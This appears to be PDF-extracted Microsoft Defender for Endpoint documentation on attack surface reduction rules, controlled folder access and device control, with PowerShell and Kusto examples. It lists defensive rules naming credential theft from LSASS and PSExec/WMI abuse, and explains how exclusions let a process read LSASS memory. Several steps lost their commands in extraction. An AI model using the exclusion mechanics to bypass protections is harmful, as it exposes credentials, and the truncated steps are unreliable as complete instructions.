For attack surface reduction rules, if you add one exclusion, it affects every attack
surface reduction rule.
Attack surface reduction rules exclusions support wildcards, paths, and environmental
variables. For more information on how to use wildcards in attack surface reduction
rules, see configure and validate exclusions based on file extension and folder location.
Be aware of the following items about attack surface reduction rules exclusions
(including wildcards and env. variables):
Most attack surface reduction rules exclusions are independent from Microsoft
Defender Antivirus exclusions. However, Microsoft Defender Antivirus exclusions
do apply to some attack surface reduction rules. See Attack surface reduction rules
reference - Microsoft Defender Antivirus exclusions and attack surface reduction
rules.
Wildcards can't be used to define a drive letter.
If you want to exclude more than one folder, in a path, use multiple instances of
\*\ to indicate multiple nested folders (for example, c:\Folder\*\*\Test )
Microsoft Endpoint Configuration Manager supports wildcards (* or ?).

If you want to exclude a file that contains random characters (automated file
generation), you can use the '?' symbol (for example,
C:\Folder\fileversion?.docx )
Attack surface reduction exclusions in Group Policy don't support quotes (the
engine natively handles long path, spaces, etc., so there's no need to use quotes).
Attack surface reduction rules run under NT AUTHORITY\SYSTEM account, so
environmental variables are limited to machine variables.
How do I know what I need to exclude?

Different attack surface reduction rules have different protection flows. Always think
about what the attack surface reduction rule you're configuring protects against, and
how the actual execution flow pans out.
Example: Block credential stealing from the Windows local security authority
subsystem Reading directly from Local Security Authority Subsystem (LSASS) process
can be a security risk, since it might expose corporate credentials.
This rule prevents untrusted processes from having direct access to LSASS memory.
Whenever a process tries to use the OpenProcess() function to access LSASS, with an
access right of PROCESS_VM_READ, the rule specifically blocks that access right.
Looking at the above example, if you really had to create an exception for the process
that the access right was blocked, adding the filename along with full path would
exclude it from being blocked and after allowed to access LSASS process memory. The
value of 0 means that attack surface reduction rules ignore this file/process and not
block/audit it.
How do I configure per-rule exclusions?

For information about configuring per-rule exclusions, see Test attack surface reduction
rules.
What are the rules Microsoft

recommends enabling?
We recommend enabling every possible rule. However, there are some cases where you
shouldn't enable a rule. For example, we don't recommend enabling the Block process
creations originating from PSExec and WMI commands rule, if you're using Microsoft
Endpoint Configuration Manager (or, System Center Configuration Manager - SCCM) to
manage your endpoints.
We highly recommend you that you read each rule-specific information and/or
warnings, which are available in our public documentation. spanning across multiple
pillars of protection, like Office, Credentials, Scripts, E-Mail, etc. All attack surface
reduction rules, except for Block persistence through WMI event subscription, are
supported on Windows 1709 and later:
Block executable content from email client and webmail
Block all Office applications from creating child processes
Block Office applications from creating executable content
Block Office applications from injecting code into other processes
Block JavaScript or VBScript from launching downloaded executable content
Block execution of potentially obfuscated scripts
Block Win32 API calls from Office macro
Use advanced protection against ransomware
(lsass.exe)
Block process creations originating from PSExec and WMI commands
Block untrusted and unsigned processes that run from USB
Block executable files from running unless they meet a prevalence, age, or trusted
list criteria
Block Office communication applications from creating child processes
Block persistence through WMI event subscription
Is Local security authority subsystem

enabled by default?
The default state for the attack Surface Reduction rule "Block credential stealing from
the Windows local security authority subsystem (lsass.exe)" changes from Not
Configured to Configured and the default mode set to Block. All other attack surface
reduction rules remain in their default state: Not Configured. Additional filtering logic
has already been incorporated in the rule to reduce end user notifications. Customers
can configure the rule to Audit, Warn or Disabled modes, which overrides the default
mode. The functionality of this rule is the same, whether the rule is configured in the on-
by-default mode, or if you enable Block mode manually.
What are some good recommendations

for getting started with attack surface
reduction?
Test how attack surface reduction rules impact your organization before enabling them
by running attack surface reduction rules in audit mode for a brief period of time. While
you're running the rules in audit mode, you can identify any line-of-business
applications that might get blocked erroneously, and exclude them from attack surface
reduction.
Larger organizations should consider rolling out attack surface reduction rules in "rings,"
by auditing and enabling rules in increasingly broader subsets of devices. You can
arrange your organization's devices into rings by using Intune or a Group Policy
management tool.
How long should I test an attack surface

reduction rule in audit mode before
enabling it?
Keep the rule in audit mode for about 30 days to get a good baseline for how the rule
operates once it goes live throughout your organization. During the audit period, you
can identify any line-of-business applications that might get blocked by the rule, and
configure the rule to exclude them.
I'm making the switch from a third-

party security solution to Defender for
Endpoint. Is there an "easy" way to
export rules from another security
solution to attack surface reduction?
In most cases, it's easier and better to start with the baseline recommendations
suggested by Defender for Endpoint than to attempt to import rules from another
security solution. Then, use tools such as audit mode, monitoring, and analytics to
configure your new solution to suit your unique needs.
The default configuration for most attack surface reduction rules, combined with
Defender for Endpoint's real-time protection, protects against a large number of
exploits and vulnerabilities.
From within Defender for Endpoint, you can update your defenses with custom
indicators, to allow and block certain software behaviors. attack surface reduction also
allows for some customization of rules, in the form of file and folder exclusions. As a
general rule, it's best to audit a rule for a period of time, and configure exclusions for
any line-of-business applications that might get blocked.
Does attack surface reduction support
file or folder exclusions that include
system variables and wildcards in the
path?
Yes. For more information on excluding files or folders from attack surface reduction
rules, see Excluding files and folders from attack surface reduction rules and for more
information on using system variables and wildcards in excluded file paths, seeConfigure
and validate exclusions based on file extension and folder location.
Do attack surface reduction rules cover

all applications by default?
It depends on the rule. Most attack surface reduction rules cover the behavior of
Microsoft Office products and services, such as Word, Excel, PowerPoint, and OneNote,
or Outlook. Certain attack surface reduction rules, such as Block execution of potentially
obfuscated scripts, are more general in scope.
Does attack surface reduction support

third-party security solutions?
attack surface reduction uses Microsoft Defender Antivirus to block applications. It is not
possible to configure attack surface reduction to use another security solution for
blocking at this time.
I have an E5 license and enabled some

attack surface reduction rules in
conjunction with Defender for Endpoint.
Is it possible for an attack surface
reduction event to not show up at all in
Defender for Endpoint's event timeline?
Whenever a notification is triggered locally by an attack surface reduction rule, a report
on the event is also sent to the Defender for Endpoint portal. If you're having trouble
finding the event, you can filter the events timeline using the search box. You can also
view attack surface reduction events by visiting Go to attack surface management, from
the Configuration management icon in the Defender for Cloud taskbar. The attack
surface management page includes a tab for report detections, which includes a full list
of attack surface reduction rule events reported to Defender for Endpoint.
I applied a rule using GPO. Now when I

try to check the indexing options for
the rule in Microsoft Outlook, I get a
message stating, 'Access denied'.
Try opening the indexing options directly from Windows 10 or Windows 11.
1. Select the Search icon on the Windows taskbar.
2. Enter Indexing options into the search box.
Are the criteria used by the rule, "Block

executable files from running unless
they meet a prevalence, age, or trusted
list criterion," configurable by an
admin?
No. The criteria used by this rule are maintained by Microsoft cloud protection, to keep
the trusted list constantly up to date with data gathered from around the world. Local
admins don't have write access to alter this data. If you're looking to configure this rule
to tailor it for your enterprise, you can add certain applications to the exclusions list to
prevent the rule from being triggered.
I enabled the attack surface reduction

rule, 'Block executable files from
running unless they meet a prevalence,
age, or trusted list criterion'. After some
time, I updated a piece of software, and
the rule is now blocking it, even though
it didn't before. Did something go
wrong?
This rule relies upon each application having a known reputation, as measured by
prevalence, age, or inclusion on a list of trusted apps. The rule's decision to block or
allow an application is ultimately determined by Microsoft cloud protection's
assessment of these criteria.
Usually, cloud protection can determine that a new version of an application is similar
enough to previous versions that it doesn't need to be reassessed at length. However, it
might take some time for the app to build reputation after switching versions,
particularly after a major update. In the meantime, you can add the application to the
exclusions list, to prevent this rule from blocking important applications. If you're
frequently updating and working with new versions of applications, you may opt instead
to run this rule in audit mode.
I recently enabled the attack surface

reduction rule, 'Block credential stealing
from the Windows local security
authority subsystem (lsass.exe)', and I'm
getting a large number of notifications.
What is going on?
A notification generated by this rule doesn't necessarily indicate malicious activity;
however, this rule is still useful for blocking malicious activity, since malware often
targets lsass.exe to gain illicit access to accounts. The lsass.exe process stores user
credentials in memory after a user has logged in. Windows uses these credentials to
validate users and apply local security policies.
Because many legitimate processes throughout a typical day are calling on lsass.exe for
credentials, this rule can be especially noisy. If a known legitimate application causes this
rule to generate an excessive number of notifications, you can add it to the exclusion
list. Most other attack surface reduction rules generate a relatively smaller number of
notifications, in comparison to this one, since calling on lsass.exe is typical of many
applications' normal functioning.
Is it a good idea to enable the rule,

'Block credential stealing from the
Windows local security authority
subsystem (lsass.exe)', alongside LSA
protection?
Enabling this rule doesn't provide additional protection if you have LSA protection
enabled as well. Both the rule and LSA protection work in much the same way, so having
both running at the same time would be redundant. However, sometimes you may not
be able to enable LSA protection. In those cases, you can enable this rule to provide
equivalent protection against malware that target lsass.exe.
See also
Attack surface reduction overview
Evaluate attack surface reduction rules
Attack surface reduction rules deployment Step 3: Implement attack surface
reduction rules
Compatibility of Microsoft Defender Antivirus with other antivirus/antimalware
Feedback

Protect important folders with
controlled folder access
Article • 11/15/2023
Applies to:

Applies to
Windows
What is controlled folder access?

Controlled folder access helps protect your valuable data from malicious apps and
threats, such as ransomware. Controlled folder access protects your data by checking
apps against a list of known, trusted apps. Supported on Windows Server 2012 R2,
Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows 10, and
Windows 11 clients, controlled folder access can be turned on using the Windows
Security App, Microsoft Endpoint Configuration Manager, or Intune (for managed
devices).
７ Note
Scripting engines are not trusted and you cannot allow them access to controlled
protected folders. For example, PowerShell is not trusted by controlled folder
access, even if you allow with certificate and file indicators.
Controlled folder access works best with Microsoft Defender for Endpoint, which gives
you detailed reporting into controlled folder access events and blocks as part of the
usual alert investigation scenarios.
 Tip
Controlled folder access blocks don't generate alerts in the Alerts queue. However,
you can view information about controlled folder access blocks in the device
timeline view, while using advanced hunting, or with custom detection rules.
How does controlled folder access work?

Controlled folder access works by only allowing trusted apps to access protected
folders. Protected folders are specified when controlled folder access is configured.
Typically, commonly used folders, such as those used for documents, pictures,
downloads, and so on, are included in the list of controlled folders.
Controlled folder access works with a list of trusted apps. Apps that are included in the
list of trusted software work as expected. Apps that are not included in the list are
prevented from making any changes to files inside protected folders.
Apps are added to the list based upon their prevalence and reputation. Apps that are
highly prevalent throughout your organization and that have never displayed any
behavior deemed malicious are considered trustworthy. Those apps are added to the list
automatically.
Apps can also be added manually to the trusted list by using Configuration Manager or
Intune. Additional actions can be performed from the Microsoft Defender portal.
Why controlled folder access is important

Controlled folder access is especially useful in helping to protect your documents and
information from ransomware . In a ransomware attack, your files can get encrypted
and held hostage. With controlled folder access in place, a notification appears on the
computer where an app attempted to make changes to a file in a protected folder. You
can customize the notification with your company details and contact information. You
can also enable the rules individually to customize what techniques the feature
monitors.
The protected folders include common system folders (including boot sectors), and you
can add more folders. You can also allow apps to give them access to the protected
folders.
You can use audit mode to evaluate how controlled folder access would impact your
organization if it were enabled.
Controlled folder access is supported on the following versions of Windows:

Windows 10, version 1709 and later
Windows 11
Windows 2012 R2
Windows 2016
Windows Server 2019
Windows Server 2022
Windows system folders are protected by

default
Windows system folders are protected by default, along with several other folders:
The protected folders include common system folders (including boot sectors), and you
can add additional folders. You can also allow apps to give them access to the protected
folders. The Windows systems folders that are protected by default are:
c:\Users\<username>\Documents
c:\Users\Public\Documents
c:\Users\<username>\Pictures
c:\Users\Public\Pictures
c:\Users\Public\Videos
c:\Users\<username>\Videos
c:\Users\<username>\Music
c:\Users\Public\Music
c:\Users\<username>\Favorites
Default folders appear in the user's profile, under This PC.

７ Note
You can configure additional folders as protected, but you cannot remove the
Windows system folders that are protected by default.
Requirements for controlled folder access
Controlled folder access requires enabling Microsoft Defender Antivirus real-time
protection.
Review controlled folder access events in the

Defender for Endpoint provides detailed reporting into events and blocks as part of its
alert investigation scenarios in the Microsoft Defender portal; see Microsoft Defender
for Endpoint in Microsoft Defender XDR.
You can query Microsoft Defender for Endpoint data by using Advanced hunting. If
you're using audit mode, you can use advanced hunting to see how controlled folder
access settings would affect your environment if they were enabled.
Example query:
PowerShell
DeviceEvents
| where ActionType in
('ControlledFolderAccessViolationAudited','ControlledFolderAccessViolationBl
ocked')
Review controlled folder access events in

You can review the Windows event log to see events that are created when controlled
folder access blocks (or audits) an app:
1. Download the Evaluation Package and extract the file cfa-events.xml to an easily
accessible location on the device.
2. Type Event viewer in the Start menu to open the Windows Event Viewer.
3. On the left panel, under Actions, select Import custom view....
4. Navigate to where you extracted cfa-events.xml and select it. Alternatively, copy
the XML directly.
5. Select OK.
The following table shows events related to controlled folder access:

ﾉ Expand table
1124 Audited controlled folder access event
1123 Blocked controlled folder access event
View or change the list of protected folders

You can use the Windows Security app to view the list of folders that are protected by
controlled folder access.
1. On your Windows 10 or Windows 11 device, open the Windows Security app.

2. Select Virus & threat protection.
3. Under Ransomware protection, select Manage ransomware protection.
4. If controlled folder access is turned off, you'll need to turn it on. Select protected
folders.
5. Do one of the following steps:
To add a folder, select + Add a protected folder.

To remove a folder, select it, and then select Remove.
７ Note
Windows system folders are protected by default, and you cannot remove them
from the list. Subfolders are also included in protection when you add a new folder
to the list.
 Tip
Feedback

Evaluate controlled folder access
Article • 02/21/2024
Applies to:

Platforms
Windows
Controlled folder access is a feature that helps protect your documents and files from
modification by suspicious or malicious apps. Controlled folder access is supported on
Windows Server 2019, Windows Server 2022, Windows 10, and Windows 11 clients.
It's especially useful in helping protect against ransomware that attempts to encrypt
your files and hold them hostage.
This article helps you evaluate controlled folder access. It explains how to enable audit
mode so you can test the feature directly in your organization.
Use audit mode to measure impact

Enable the controlled folder access in audit mode to see a record of what could occur if
it were enabled. Test how the feature works in your organization to ensure it doesn't
affect your line-of-business apps. You can also get an idea of how many suspicious
attempts to modify files generally occur over a certain period of time.
To enable audit mode, use the following PowerShell cmdlet:
PowerShell
Set-MpPreference -EnableControlledFolderAccess AuditMode
 Tip
If you want to fully audit how controlled folder access will work in your
organization, you'll need to use a management tool to deploy this setting to
devices in your network(s). You can also use Group Policy, Intune, mobile device
management (MDM), or Microsoft Configuration Manager to configure and deploy
the setting, as described in the main controlled folder access topic.
Review controlled folder access events in

The following controlled folder access events appear in Windows Event Viewer under
Microsoft/Windows/Windows Defender/Operational folder.
ﾉ Expand table
1124 Audited controlled folder access event
1123 Blocked controlled folder access event
 Tip
You can configure a Windows Event Forwarding subscription to collect the logs
centrally.
Customize protected folders and apps

During your evaluation, you might want to add to the list of protected folders, or allow
certain apps to modify files.
See Protect important folders with controlled folder access for configuring the feature
with management tools, including Group Policy, PowerShell, and MDM configuration
service providers (CSPs).
See also
Protect important folders with controlled folder access
Use audit mode
 Tip
Feedback

Enable controlled folder access
Article • 08/16/2023
Applies to:

Platforms
Windows
threats, such as ransomware. Controlled folder access is included with Windows 10,
Windows 11, and Windows Server 2019. Controlled folder access is also included as part
of the modern, unified solution for Windows Server 2012R2 and 2016.
You can enable controlled folder access by using any of these methods:
Windows Security app *

Microsoft Intune
Group Policy
PowerShell
 Tip
Try using audit mode at first so you can see how the feature works and review
events without impacting normal device usage in your organization.
Group Policy settings that disable local administrator list merging will override
controlled folder access settings. They also override protected folders and allowed apps
set by the local administrator through controlled folder access. These policies include:
Microsoft Defender Antivirus Configure local administrator merge behavior for

lists
System Center Endpoint Protection Allow users to add exclusions and overrides
For more information about disabling local list merging, see Prevent or allow users to
locally modify Microsoft Defender Antivirus policy settings.
Windows Security app

1. Open the Windows Security app by selecting the shield icon in the task bar. You
can also search the start menu for Windows Security.
2. Select the Virus & threat protection tile (or the shield icon on the left menu bar)
and then select Ransomware protection.
3. Set the switch for Controlled folder access to On.
７ Note
*This method is not available on Windows Server 2012R2 or 2016.
If controlled folder access is configured with Group Policy, PowerShell, or MDM

CSPs, the state will change in the Windows Security app after a restart of the
device. If the feature is set to Audit mode with any of those tools, the Windows
Security app will show the state as Off. If you are protecting user profile data, we
recommend that the user profile should be on the default Windows installation
drive.
Microsoft Intune
1. Sign in to the Microsoft Intune admin center and open Endpoint Security.
2. Go to Attack Surface Reduction > Policy.
3. Select Platform, choose Windows 10, Windows 11, and Windows Server, and
select the profile Attack Surface Reduction rules > Create.
4. Name the policy and add a description. Select Next.
5. Scroll down, and in the Enable Controlled Folder Access drop-down, select an
option, such as Audit Mode.
We recommend enabling controlled folder access in audit mode first to see how
it'll work in your organization. You can set it to another mode, such as Enabled,
later.
6. To optionally add folders that should be protected, select Controlled Folder
Access Protected Folders and then add folders. Files in these folders can't be
modified or deleted by untrusted applications. Keep in mind that your default
system folders are automatically protected. You can view the list of default system
folders in the Windows Security app on a Windows device. To learn more about
this setting, see Policy CSP - Defender: ControlledFolderAccessProtectedFolders.
7. To optionally add applications that should be trusted, select Controlled Folder

Access Allowed Applications and then add the apps can access protected folders.
Microsoft Defender Antivirus automatically determines which applications should
be trusted. Only use this setting to specify additional applications. To learn more
about this setting, see Policy CSP - Defender:
ControlledFolderAccessAllowedApplications.
8. Select the profile Assignments, assign to All Users & All Devices, and select Save.
9. Select Next to save each open blade and then Create.
７ Note
Wildcards are supported for applications, but not for folders. Subfolders are not
protected. Allowed apps will continue to trigger events until they are restarted.

Use the ./Vendor/MSFT/Policy/Config/ControlledFolderAccessProtectedFolders
configuration service provider (CSP) to allow apps to make changes to protected folders.

3. Enter a name and a description, select Controlled folder access, and select Next.
4. Choose whether block or audit changes, allow other apps, or add other folders,
and select Next.
７ Note
Wildcard is supported for applications, but not for folders. Subfolders are not
protected. Allowed apps will continue to trigger events until they are
restarted.
5. Review the settings and select Next to create the policy.
6. After the policy is created, Close.
Group Policy
1. On your Group Policy management device, open the Group Policy Management
Edit.

Microsoft Defender Exploit Guard > Controlled folder access.
4. Double-click the Configure Controlled folder access setting and set the option to
Enabled. In the options section you must specify one of the following options:
Enable - Malicious and suspicious apps won't be allowed to make changes to

files in protected folders. A notification will be provided in the Windows event
log.
Disable (Default) - The Controlled folder access feature won't work. All apps
can make changes to files in protected folders.
Audit Mode - Changes will be allowed if a malicious or suspicious app
attempts to make a change to a file in a protected folder. However, it will be
recorded in the Windows event log where you can assess the impact on your
organization.
Block disk modification only - Attempts by untrusted apps to write to disk
sectors will be logged in Windows Event log. These logs can be found in
Applications and Services Logs > Microsoft > Windows > Windows
Defender > Operational > ID 1123.
Audit disk modification only - Only attempts to write to protected disk
sectors will be recorded in the Windows event log (under Applications and
Services Logs > Microsoft > Windows > Windows Defender > Operational
> ID 1124). Attempts to modify or delete files in protected folders won't be
recorded.

） Important
To fully enable controlled folder access, you must set the Group Policy option to
Enabled and select Block in the options drop-down menu.
PowerShell
as administrator.
PowerShell
You can enable the feature in audit mode by specifying AuditMode instead of Enabled .
Use Disabled to turn off the feature.
See also
Customize controlled folder access
 Tip
Feedback

Customize controlled folder access
Article • 10/27/2023
Applies to:

Platforms
Windows
 Tip
threats, such as ransomware. Controlled folder access is supported on Windows Server
2019, Windows Server 2022, Windows 10, and Windows 11 clients. This article describes
how to customize controlled folder access capabilities, and includes the following
sections:
Protect additional folders

Add apps that should be allowed to access protected folders
Allow signed executable files to access protected folders
） Important
Controlled folder access monitors apps for activities that are detected as malicious.
Sometimes, legitimate apps are blocked from making changes to your files. If
controlled folder access impacts your organization's productivity, you might
consider running this feature in audit mode to fully assess the impact.
Protect additional folders

Controlled folder access applies to many system folders and default locations, including
folders such as Documents, Pictures, and Movies. You can add other folders to be
protected, but you cannot remove the default folders in the default list.
Adding other folders to controlled folder access can be helpful for cases when you don't
store files in the default Windows libraries, or you've changed the default location of
your libraries.
You can also specify network shares and mapped drives. Environment variables are
supported; however, wildcards are not.
You can use the Windows Security app, Group Policy, PowerShell cmdlets, or mobile
device management configuration service providers to add and remove protected
folders.
Use the Windows Security app to protect additional

folders
1. Open the Windows Security app by selecting the shield icon in the task bar, or by
searching for security in the Start menu.
2. Select Virus & threat protection, and then scroll down to the Ransomware
protection section.
3. Select Manage ransomware protection to open the Ransomware protection pane.
4. Under the Controlled folder access section, select Protected folders.
5. Choose Yes on the User Access Control prompt. The Protected folders pane
displays.
6. Select Add a protected folder and follow the prompts to add folders.
Use Group Policy to protect additional folders

Console.
2. Right-click the Group Policy Object you want to configure, and then select Edit.
3. In your Group Policy Management Editor, go to Computer configuration >

Policies > Administrative templates.
Windows Defender Exploit Guard > Controlled folder access.
NOTE: On older versions of Windows, you might see Windows Defender Antivirus
instead of Microsoft Defender Antivirus.
5. Double-click Configured protected folders, and then set the option to Enabled.
Select Show, and specify each folder that you want to protect.
6. Deploy your Group Policy Object as you usually do.
Use PowerShell to protect additional folders

1. Type PowerShell in the Start menu, right-click Windows PowerShell and select Run
as administrator
2. Type the following PowerShell cmdlet, replacing <the folder to be protected>

with the folder's path (such as "c:\apps\" ):
PowerShell
Add-MpPreference -ControlledFolderAccessProtectedFolders "<the folder

to be protected>"
3. Repeat step 2 for each folder that you want to protect. Folders that are protected
are visible in the Windows Security app.

） Important
Use Add-MpPreference to append or add apps to the list and not Set-MpPreference .
Using the Set-MpPreference cmdlet will overwrite the existing list.
Use MDM CSPs to protect additional folders

Use the ./Vendor/MSFT/Policy/Config/Defender/GuardedFoldersList configuration
service provider (CSP) to allow apps to make changes to protected folders.
Allow specific apps to make changes to

controlled folders
You can specify if certain apps are always considered safe and give write access to files
in protected folders. Allowing apps can be useful if a particular app you know and trust
is being blocked by the controlled folder access feature.
） Important
By default, Windows adds apps that are considered friendly to the allowed list. Such
apps that are added automatically are not recorded in the list shown in the
Windows Security app or by using the associated PowerShell cmdlets. You shouldn't
need to add most apps. Only add apps if they are being blocked and you can verify
their trustworthiness.
When you add an app, you have to specify the app's location. Only the app in that
location will be permitted access to the protected folders. If the app (with the same
name) is in a different location, it will not be added to the allowlist and may be blocked
by controlled folder access.
An allowed application or service only has write access to a controlled folder after it
starts. For example, an update service will continue to trigger events after it's allowed
until it is stopped and restarted.
Use the Windows Defender Security app to allow specific

apps
1. Open the Windows Security app by searching the start menu for Security.
2. Select the Virus & threat protection tile (or the shield icon on the left menu bar)
and then select Manage ransomware protection.
3. Under the Controlled folder access section, select Allow an app through
4. Select Add an allowed app and follow the prompts to add apps.
Use Group Policy to allow specific apps

Console, right-click the Group Policy Object you want to configure and select Edit.

Windows Defender Exploit Guard > Controlled folder access.
4. Double-click the Configure allowed applications setting and then set the option
to Enabled. Select Show.
5. Add the full path to the executable in Value name. Set Value to 0 . For example, to
allow the Command Prompt set Value name as C:\Windows\System32\cmd.exe .
Value should be set to 0 .
Use PowerShell to allow specific apps

1. Type PowerShell in the Start menu, right-click Windows PowerShell and then
select Run as administrator

PowerShell
Add-MpPreference -ControlledFolderAccessAllowedApplications "<the app

that should be allowed, including the path>"
For example, to add the executable test.exe located in the folder C:\apps, the
cmdlet would be as follows:
PowerShell
Add-MpPreference -ControlledFolderAccessAllowedApplications
"c:\apps\test.exe"
Continue to use Add-MpPreference -ControlledFolderAccessAllowedApplications to

add more apps to the list. Apps added using this cmdlet will appear in the
Windows Security app.
） Important
Use MDM CSPs to allow specific apps
Use the
./Vendor/MSFT/Policy/Config/Defender/ControlledFolderAccessAllowedApplications
configuration service provider (CSP) to allow apps to make changes to protected folders.
Allow signed executable files to access

protected folders
Microsoft Defender for Endpoint certificate and file indicators can allow signed
executable files to access protected folders. For implementation details, see Create
indicators based on certificates.
７ Note
This does no apply to scripting engines, including Powershell

For more information about customizing the notification when a rule is triggered and
blocks an app or file, see Configure alert notifications in Microsoft Defender for
Endpoint.
See also
Enable controlled folder access
 Tip
Feedback

Device control in Microsoft Defender for
Endpoint
Article • 02/14/2024
Applies to:

Device control capabilities in Microsoft Defender for Endpoint enable your security team
to control whether users can install and use peripheral devices, like removable storage
(USB thumb drives, CDs, disks, etc.), printers, Bluetooth devices, or other devices with
their computers. Your security team can configure device control policies to configure
rules like these:
Prevent users from installing and using certain devices (like USB drives)
Prevent users from installing and using any external devices with specific
exceptions
Allow users to install and use specific devices
Allow users to install and use only BitLocker-encrypted devices with Windows
computers
This list is intended to provide some examples. It's not an exhaustive list; there are other
examples to consider (see the device control in Windows section in this article).
Device control helps protect your organization from potential data loss, malware, or
other cyberthreats by allowing or preventing certain devices to be connected to users'
computers. With device control, your security team can determine whether and what
peripheral devices users can install and use on their computers.
Device control in Windows

This section lists scenarios for device control in Windows.
 Tip
If you're using Mac, device control can control access to Bluetooth, iOS devices,
portable devices such as cameras, and removable media such as USB devices. See
Device Control for macOS.
Select a tab, review the scenarios, and then identify the type of device control policy to
create.
Removable storage
ﾉ Expand table
Scenario Device control policy
Prevent installation of a specific USB device Device control in Windows. See

Device control policies.
Prevent installation of all USB devices while allowing Device control in Windows. See
an installation of only an authorized USB Device control policies.
Prevent Write and Execute access to all but allow Device control in Defender for
specific approved USBs Endpoint. See Device control
policies.
Audit Write and Execute access for all but block Device control in Defender for
specific blocked USBs Endpoint. See Device control
policies.
Block read and execute access to specific file Device control in Microsoft
extension Defender. See Device control
policies.
Block people from access removable storage when Device control in Microsoft
the machine isn't connecting corporate network Defender. See Device control
policies.
Block write access to removable data drives not Device control in Windows. See
protected by BitLocker BitLocker.
Block write access to devices configured in another Device control in Windows. See
organization BitLocker.
Prevent copying of sensitive files to USB Endpoint DLP
Supported devices
Device control supports Bluetooth devices, CD/ROMs and DVD devices, printers, USB
devices, and other types of portable devices. On a Windows device, based on the driver,
some peripheral devices are marked as removable. The following table lists examples of
devices that device control supports with their primary_id values and media class
names:
ﾉ Expand table
Device type PrimaryId in primary_id in Media Class Name

Windows macOS
Bluetooth devices bluetoothDevice Bluetooth Devices
CD/ROMs, DVDs CdRomDevices CD-Roms
iOS devices appleDevice
Portable devices (such portableDevice

as cameras)
Printers PrinterDevices Printers
USB devices (removable RemovableMediaDevices removableMedia USB

media)
Windows Portable WpdDevices Windows Portable

Devices Devices (WPD)
Categories of Microsoft device control

capabilities
Device control capabilities from Microsoft can be organized into three main categories:
device control in Windows, device control in Defender for Endpoint, and Endpoint Data
Loss Prevention (Endpoint DLP).
Device control in Windows. The Windows operating system has built-in device
control capabilities. Your security team can configure device installation settings to
prevent (or allow) users from installing certain devices on their computers. Policies
are applied at the device level, and use various device properties to determine
whether or not a user can install/use a device. Device control in Windows works
with BitLocker and ADMX templates, and can be managed using Intune.
BitLocker and Intune. BitLocker is a Windows security feature that provides

encryption for entire volumes. Together with Intune, policies can be configured
to enforce encryption on devices using BitLocker for Windows (and FileVault for
Mac). For more information, see Disk encryption policy settings for endpoint
security in Intune.
Administrative Templates (ADMX) and Intune. You can use ADMX templates to
create policies that restrict or allow specific types of USB devices to be used
with computers. For more information, see Restrict USB devices and allow
specific USB devices using ADMX templates in Intune.
Device control in Defender for Endpoint. Device control in Defender for Endpoint
provides more advanced capabilities and is cross platform. You can configure
device control settings to prevent (or allow) users to have Read, Write, or Execute
access to content on removable storage devices. You can define exceptions, and
you can choose to employ audit policies that detect but don't block users from
accessing their removable storage devices. Policies are applied at the device level,
user level, or both. Device control in Microsoft Defender can be managed using
Intune.
Device control in Microsoft Defender and Intune. Intune provides a rich
experience for managing complex device control policies for organizations. You
can configure and deploy device restriction settings in Defender for Endpoint,
for example. See Configure device restriction settings in Microsoft Intune.
Endpoint data loss prevention (Endpoint DLP). Endpoint DLP monitors sensitive
information on devices that are onboarded to Microsoft Purview solutions. DLP
policies can enforce protective actions on sensitive information and where it's
stored or used. Learn about Endpoint DLP.
See the device control scenarios section (in this article) for more details about these
capabilities.
Device control samples and scenarios

Device control in Defender for Endpoint provides your security team with a robust
access control model that enables a wide range of scenarios (see Device control
policies). We have put together a GitHub repository that contains samples and scenarios
you can explore. See the following resources:
Device control samples README

Getting started with device control samples on Windows devices
Device control for macOS samples
If you're new to device control, see Device control walkthroughs.
Prerequisites
Device control in Defender for Endpoint can be applied to devices running Windows 10
or Windows 11 that have the anti-malware client version 4.18.2103.3 or later.
(Currently, servers are not supported.)
4.18.2104 or later: Add SerialNumberId , VID_PID , filepath-based GPO support, and
ComputerSid
4.18.2105 or later: Add Wildcard support for

HardwareId/DeviceId/InstancePathId/FriendlyNameId/SerialNumberId , the
combination of specific user on specific machine, removable SSD (a SanDisk

Extreme SSD)/USB Attached SCSI (UAS) support
4.18.2107 or later: Add Windows Portable Device (WPD) support (for mobile
devices, such as tablets); add AccountName into advanced hunting

4.18.2205 or later: Expand the default enforcement to Printer. If you set it to Deny,
it blocks Printer as well, so if you only want to manage storage, make sure to
create a custom policy to allow Printer
4.18.2207 or later: Add File support; the common use case can be: block people
from Read/Write/Execute access specific file on removable storage. Add Network

and VPN Connection support; the common use case can be: block people from
access removable storage when the machine isn't connecting corporate network.
For Mac, see Device Control for macOS.
Currently, device control is not supported on servers.
Next steps
Device control walkthroughs
Learn about Device control policies
View device control reports
Feedback

Device control walkthroughs
Article • 02/14/2024
Applies to:

This article describes different ways to see how device control works. Beginning with
default settings, each section describes how to configure device control to achieve
certain objectives.
Explore the default state of device control

By default, device control is disabled and there are no restrictions on which devices can
be added. The auditing of basic device control events is enabled for devices that are
onboarded to Defender for Endpoint. This activity can be seen in the device control
report. Filtering on the built-in PnP Audit Policy shows devices that are connected to
the endpoints in the environment.
Device control in Defender for Endpoint identifies a device based on its properties.
Device properties are visible by selecting an entry in the report.
The Device ID, Vendor ID (VID), Serial number, and Bus type can all be used to identify
a device (see [Device control policies in Microsoft Defender for Endpoint](device-
control-policies.mddata is also available in advanced hunting, by searching for the Plug
and Play Device Connected action ( PnPDeviceConnected ), as shown in the following
example query:
Kusto
DeviceEvents
| where ActionType == "PnpDeviceConnected"
| extend parsed=parse_json(AdditionalFields)
| extend MediaClass = tostring(parsed.ClassName)
| extend MediaDeviceId = tostring(parsed.DeviceId)
| extend MediaDescription = tostring(parsed.DeviceDescription)
| extend MediaSerialNumber = tostring(parsed.SerialNumber)
| project Timestamp, DeviceId, DeviceName, AccountName, AccountDomain,
MediaClass, MediaDeviceId, MediaDescription, MediaSerialNumber, parsed
| order by Timestamp desc
The status of device control (enabled/disabled, default enforcement, and last policy
update) is available on a device via Get-MpComputerStatus, as illustrated in the
following snippet:
PowerShell
DeviceControlDefaultEnforcement :
DeviceControlPoliciesLastUpdated : 1/3/2024 12:51:56 PM
DeviceControlState : Disabled
Change the device control state to be enabled* on a test device. Make sure the policy is
applied by checking Get-MpComputerStatus, as illustrated in the following snippet:
PowerShell
DeviceControlDefaultEnforcement : DefaultAllow
DeviceControlPoliciesLastUpdated : 1/4/2024 10:27:06 AM
DeviceControlState : Enabled
In the test device, insert a USB drive. There are no restrictions; all types of access (read,
write, execute, and print) are allowed. A record is created to show that a USB device was
connected. You can use the following example advanced hunting query to see it:
Kusto
DeviceEvents
